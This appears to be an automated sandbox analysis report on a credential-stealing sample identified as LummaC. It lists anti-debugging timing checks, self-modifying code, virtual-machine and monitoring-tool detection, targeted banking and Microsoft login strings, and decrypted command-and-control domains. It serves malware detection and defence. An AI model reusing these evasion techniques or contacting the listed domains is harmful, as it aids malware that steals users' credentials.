              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54104B3 second address: 541052E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4668B9A72Fh 0x00000009 xor al, 0000005Eh 0x0000000c jmp 00007F4668B9A739h 0x00000011 popfd 0x00000012 jmp 00007F4668B9A730h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f mov bx, cx 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F4668B9A734h 0x00000029 xchg eax, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4668B9A737h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105BE second address: 54105C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105C2 second address: 54105C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54106F8 second address: 54106FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541077A second address: 54107C3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4668B9A733h 0x00000008 xor si, F67Eh 0x0000000d jmp 00007F4668B9A739h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test eax, eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4668B9A72Dh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54107C3 second address: 54107CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54107CA second address: 541081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jg 00007F46D92283E1h 0x0000000d jmp 00007F4668B9A739h 0x00000012 js 00007F4668B9A775h 0x00000018 pushad 0x00000019 push ecx 0x0000001a push ebx 0x0000001b pop eax 0x0000001c pop ebx 0x0000001d mov ebx, eax 0x0000001f popad 0x00000020 cmp dword ptr [ebp-14h], edi 0x00000023 jmp 00007F4668B9A72Eh 0x00000028 jne 00007F46D92283B2h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541081B second address: 541081F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541081F second address: 541083C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A739h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541083C second address: 541089B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007F466925DDA0h 0x00000012 mov bx, si 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-2Ch] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F466925DD9Ah 0x00000020 add ecx, 6E223A28h 0x00000026 jmp 00007F466925DD9Bh 0x0000002b popfd 0x0000002c mov ah, 33h 0x0000002e popad 0x0000002f push ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F466925DDA7h 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541089B second address: 54108C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A739h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edx, ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108C0 second address: 541096F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F466925DDA6h 0x00000008 adc al, 00000048h 0x0000000b jmp 00007F466925DD9Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx ecx, di 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F466925DD9Eh 0x0000001f sbb ecx, 2CC523A8h 0x00000025 jmp 00007F466925DD9Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F466925DDA8h 0x00000031 sbb ah, 00000008h 0x00000034 jmp 00007F466925DD9Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esp], eax 0x0000003e pushad 0x0000003f movzx eax, dx 0x00000042 movsx edi, cx 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007F466925DDA8h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F466925DD9Eh 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541096F second address: 5410975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410008 second address: 541000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541000C second address: 5410012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410012 second address: 5410082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F466925DD9Bh 0x00000009 sbb ecx, 76C1110Eh 0x0000000f jmp 00007F466925DDA9h 0x00000014 popfd 0x00000015 jmp 00007F466925DDA0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F466925DD9Eh 0x00000025 jmp 00007F466925DDA5h 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov esi, 673FB33Dh 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410082 second address: 5410090 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 4639h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410090 second address: 541011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F466925DDA1h 0x0000000a adc ax, 0006h 0x0000000f jmp 00007F466925DDA1h 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F466925DDA0h 0x0000001c jmp 00007F466925DDA5h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 movzx eax, bx 0x00000028 pushad 0x00000029 mov bl, F0h 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007F466925DD9Ch 0x00000036 xchg eax, ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F466925DDA7h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54101B3 second address: 54101E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A739h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A72Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54101E0 second address: 5410EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b and bl, 00000001h 0x0000000e movzx eax, bl 0x00000011 lea esp, dword ptr [ebp-0Ch] 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pop ebx 0x00000017 pop ebp 0x00000018 ret 0x00000019 add esp, 04h 0x0000001c jmp dword ptr [0006A41Ch+ebx*4] 0x00000023 push edi 0x00000024 call 00007F4669283797h 0x00000029 push ebp 0x0000002a push ebx 0x0000002b push edi 0x0000002c push esi 0x0000002d sub esp, 000001D0h 0x00000033 mov dword ptr [esp+000001B4h], 0006CB10h 0x0000003e mov dword ptr [esp+000001B0h], 000000D0h 0x00000049 mov dword ptr [esp], 00000000h 0x00000050 mov eax, dword ptr [000681DCh] 0x00000055 call eax 0x00000057 mov edi, edi 0x00000059 pushad 0x0000005a pushfd 0x0000005b jmp 00007F466925DD9Eh 0x00000060 sbb al, 00000028h 0x00000063 jmp 00007F466925DD9Bh 0x00000068 popfd 0x00000069 mov bx, ax 0x0000006c popad 0x0000006d xchg eax, ebp 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 mov si, bx 0x00000074 call 00007F466925DDA3h 0x00000079 pop ecx 0x0000007a popad 0x0000007b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410EDE second address: 5410EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410EE4 second address: 5410EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410EE8 second address: 5410F0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A730h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4668B9A72Eh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410F0F second address: 5410F50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F466925DDA6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F466925DDA7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54200FF second address: 5420105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420105 second address: 5420119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46D98C260Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420119 second address: 542011D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542011D second address: 5420123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420123 second address: 5420151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7B811AE4h 0x00000008 jmp 00007F4668B9A72Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [ebp+08h], 00002000h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4668B9A72Dh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543084D second address: 5430893 instructions: 0x00000000 rdtsc 0x00000002 call 00007F466925DDA6h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bx, 5506h 0x0000000e popad 0x0000000f push edx 0x00000010 jmp 00007F466925DD9Ah 0x00000015 mov dword ptr [esp], ebp 0x00000018 jmp 00007F466925DDA0h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430893 second address: 5430897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430897 second address: 543089D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543089D second address: 54308C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov ebx, 2C6DE620h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54308C4 second address: 54308CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54308CA second address: 5430914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 45C6636Fh 0x00000008 pushfd 0x00000009 jmp 00007F4668B9A734h 0x0000000e adc eax, 2EBED398h 0x00000014 jmp 00007F4668B9A72Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4668B9A735h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430914 second address: 543091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543091A second address: 543093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A733h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543093C second address: 5430942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430942 second address: 5430948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430948 second address: 543094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543094C second address: 5430993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4668B9A72Dh 0x00000016 sub cx, 96A6h 0x0000001b jmp 00007F4668B9A731h 0x00000020 popfd 0x00000021 push ecx 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430993 second address: 54309D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F46D98BB7A9h 0x0000000f jmp 00007F466925DD9Eh 0x00000014 cmp dword ptr [75AF459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F466925DDA7h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54309D8 second address: 5430A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A739h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F46D92101C8h 0x0000000f pushad 0x00000010 mov edx, esi 0x00000012 mov eax, 32A8EB7Fh 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4668B9A72Ch 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430A15 second address: 5430A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430A19 second address: 5430A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430AFF second address: 5430B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430B07 second address: 5430B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430B46 second address: 5430B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EB9C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 219359 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 24289F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 22BD75 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EBA2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2A75FB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2436Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6764Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2132501021.00000000001FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060339315.0000000005D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000002.2133160668.000000000156E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2060339315.0000000005D3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2132501021.00000000001FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2060508885.0000000005E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
